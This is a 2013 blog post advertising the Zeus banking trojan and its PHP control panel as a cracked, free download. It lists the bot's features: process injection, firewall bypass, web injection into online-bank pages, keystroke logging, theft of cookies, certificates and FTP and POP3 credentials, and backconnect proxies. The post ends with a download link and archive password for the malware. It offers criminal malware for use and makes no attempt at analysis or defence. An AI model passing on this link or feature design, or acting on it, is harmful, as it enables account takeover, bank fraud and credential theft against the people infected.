d0837296baef4fc14d667832c1a5215944b54a8f46af2d5c5c Zeus Bot w/ Source botnet | TipsS And TricksS

Zeus Bot w/ Source botnet

on Tuesday, 19 February 2013
Zeus Bot
Price $ 1200 USA
and now it is broken at website: http://botnetvietnam.com = 0 USA

Description: Bot


Programming language and IDE:
- Visual C + + (current version 9.0). No additional libraries use (Crtl, MFC, etc.).
Supported operating systems:
- XP / Vista / Seven, as 2003/2003R2/2008/2008R2. Including work under Windows x64, but only for 32-bit process x. Just keep working full bot activity "Terminal Server" version.
Action principle:
- Bot is based on blocking the WinAPI, by connecting in ring3 (user mode), by running a copy of its code in each process of the user (without using DLL).
The installation process:
At this point, the bot is designed mainly to work on Vista / Seven, with enabled UAC, and without the use of local operators. So bot is designed to work with minimal privileges (including the "Guest" user), this bot always work in the session for each user (you install bot). Bot can be set for each use in the operating system, while the program will not know about each other. When you run the bot as "LocalSystem", it will try to infect all users in the system.
When you install, bot creates its copy in the user's home directory, this copy is attached to the current user and the operating system, and can not be run by another user, or system more. The original version of the bot (used for installation), will be automatically deleted, regardless successfully installed.
Session with the server (control panel):
Session with the server through a series of processes from a "white list" Internal allows you to bypass most firewalls. In the session, the bot can be configured to send reports to accumulate and report their status to the server and receive commands to execute on the computer. The session takes place via HTTP protocol, all data sent by a bot, and received from the server is encrypted with a unique key for each botnet.
Protection:
Unique names of all objects (files, mutexes, registry keys) when creating a bot for each user and a botnet.Fixed bots not be run with a different operating system or the user. Destroy the code used to install the bot.At this point not be made to hide the bot files via WinAPI, because anti-virus tool is very easy to find a file, and allows us to identify the location of the bot.Automatically update the bot, does not require restart.Monitoring the integrity of the file bot.
Server-side function bot:
- Socks 4/4a/5 server with support for UDP and IPv6.- Backconnect for any service (RDP, Socks, FTP, etc.) on the infected machine. That is: you can gain access to a computer is behind a NAT, or, for example, has been banned by a firewall connection. For this feature to work is to use additional applications to run on any Windows server on the Internet, which has a dedicated IP.Getting a screenshot of your desktop in real time.- Block HTTP / HTTPS requests from wininet.dll (Internet Explorer, Maxton, etc.), nspr4.dll (Mozilla Firefox) libraries:
Modify the content of the page is loaded (HTTP-injection).- Transparent page redirection (HTTP author).- The right piece of content data (eg bank account balance).- Temporary blocking HTTP-injection and HTTP-fakes.- Temporary blocking access to a certain URL.- Blocking logging requests for specific URL.- Forcing logging of all GET requests for specific URL.- Create a snapshot of the screen around the mouse cursor in the click of a button.- Getting session cookies and blocking user access to specific URLs.- Get important information from the user program:Log from FTP clients: FlashFXP, CuteFTP, Total Commander, WsFTP, FileZilla, FAR Manager, WinSCP, FTP Commander, CoreFTP, SmartFTP."Cookies" Adobe (Macromedia) Flash Player.Wininet.dll "Cookies", Mozilla Firefox.- Import a certificate from the Windows certificate store. And tracking their subsequent supplements.- Subscribe pressing the keyboard keys.- Traffic sniffer for TCP in Windows socket.
- Intercept FTP login on any port.- Intercept POP3 login on any port.
Miscellaneous:
Execute scripts (commands), was created in the control panel.Separate botnets to subbotnets (by name).

Description: Dashboard


Programming languages:
- PHP, using the mbstring extension, mysql.
Show statistics:
- The number of infected computers.- Current number of online programs.- The number of new programs.- Daily activity program.- National Statistics.- Statistics of the operating system.- Working with a list of programs:Filter the list by country, botnets, IP address, NAT status, etc.Show screenshots desktop in real time (only for programs outside NAT).- Mass state inspection Socks server.- Display detailed information about programs. The most important are:Windows version, user language and time zone.Position and computer IP address (not local).Internet connection speed (measured by calculating the load time of a resource-HTTP predefined).First and last communication with the server.Online time.- The ability to set comment for each bot.
Script (command):
- You can control the program by creating a script for them. Currently, the ability to script syntax and very primitive.
Working with report (log) file and the program:
Files (such as screenshots, cookies Flash Player) received from the program always write files on the server. You will have the opportunity to search for files with a filter: program content, botnets and file name.
- Reports can be written in the file (% / reports.txt bot_id botnet% /%%), and in the database. In the first case, the search for records in exactly the same as for files. In the second case, you get more flexible filters, and reports from the control panel.
Receive notification of IM (Jabber):
- You can get the message from Jabber account Control Panel.
- At this point there is a possibility to get informed about a user on a HTTP / HTTPS source identification. For example, it is used to capture user sessions in an online bank.
Miscellaneous:
Create table users with specific access control.Displays information about the server software.Automatic recovery of MyISAM tables damaged.
linkdownloadhttp://botnetvietnam.googlecode.com/files/ZeuS% 202.0.8.9% 20% 28botnetvietnam.com% 29.rarpass: botnetvietnam.com

0 comments:

Post a Comment